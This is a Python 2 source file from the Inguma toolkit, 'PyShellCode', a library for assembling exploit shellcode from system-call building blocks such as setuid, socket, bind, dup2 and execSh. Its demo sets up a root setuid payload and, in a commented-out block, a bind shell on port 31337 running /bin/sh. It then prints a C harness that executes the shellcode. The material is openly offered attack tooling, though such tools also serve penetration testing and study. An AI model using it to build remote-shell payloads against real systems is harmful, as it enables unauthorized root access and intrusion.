#!/usr/bin/python

"""
PyShellCode library for Inguma Version 0.0.2
A library to write shellcodes coding in python.
Copyright (c) 2006, 2007 Joxean Koret, joxeankoret [at] yahoo.es

This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; version 2
of the License.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
"""
import sys
import binascii

class PyEgg:

    osType = None
    processor = None
    buf = ""
    internal = None

    badChars = []
    ids = 0
    generator = None

    def __init__(self, mOsType="linux", mProcessor="x86", mIds = 0):
        self.osType = mOsType.lower()
        self.processor = mProcessor.lower()
        self.ids = mIds

        if not self.osType.isalnum() or not self.processor.isalnum():
            print "ERROR: Unacceptable module %s.%s" % (self.osType, self.processor)
            raise

        # FIXME: Horrible hack!
        module = "import %s.%s as internal" % (self.processor, self.osType)
        exec(module)

        self.internal = internal
        self.generator = internal.CBaseShellcode()
        self.generator.ids = self.ids

    def getNops(self, size):
        return self.generator.nop(size, self.badChars)

    def getShellcode(self):
        ret = ""
        for c in self.buf:
            ret += chr(92) + "x" + binascii.b2a_hex(c)

        return ret

    def getEgg(self):
        return self.buf

    def appendNops(self, size):
        self.buf += self.getNops(size)

    def setuid(self, mid = 0):
        self.buf += self.generator.setuid(mid)

    def setgid(self, mid = 0):
        self.buf += self.generator.setgid(mid)

    def socket(self, adomain, atype, aprotocol=0):
        self.buf += self.generator.socket(adomain, atype, aprotocol)

    def bind(self, aport):
        self.buf += self.generator.bind(aport)

    def listen(self, abacklog=1):
        self.buf += self.generator.listen(abacklog)

    def accept(self):
        self.buf += self.generator.accept()

    def exit(self, retvalue=0):
        self.buf += self.generator.exit(retvalue)

    def close(self, fd=0):
        self.buf += self.generator.close(fd)

    def dup2(self, fd=0):
        self.buf += self.generator.dup2(fd)

    def execSh(self):
        self.buf += self.generator.execSh()

if __name__ == "__main__":

    import socket

    #a = PyEgg("openbsd")
    #a = PyEgg("linux")
    a = PyEgg("macosx")

    # Change to root
    a.setuid(0)
    """
    a.setgid(0)

    # Listen in all available addresses at port 31337
    a.socket(socket.AF_INET, socket.SOCK_STREAM)
    a.bind(31337)
    a.listen()

    # Got a connection, duplicate fd descriptors
    a.accept()
    a.dup2(2)
    a.dup2(1)
    a.dup2(0)

    # Run /bin/sh
    a.execSh()

    # Uncomment to append 101 characters (NOPS)
    a.appendNops(101)"""
    sc = a.getShellcode()

    print "#include <stdio.h>"
    print
    print 'char *sc="%s";' % sc
    print
    print "int main(void) {"
    print "\t((void(*)())sc)();"
    print "}"
    print

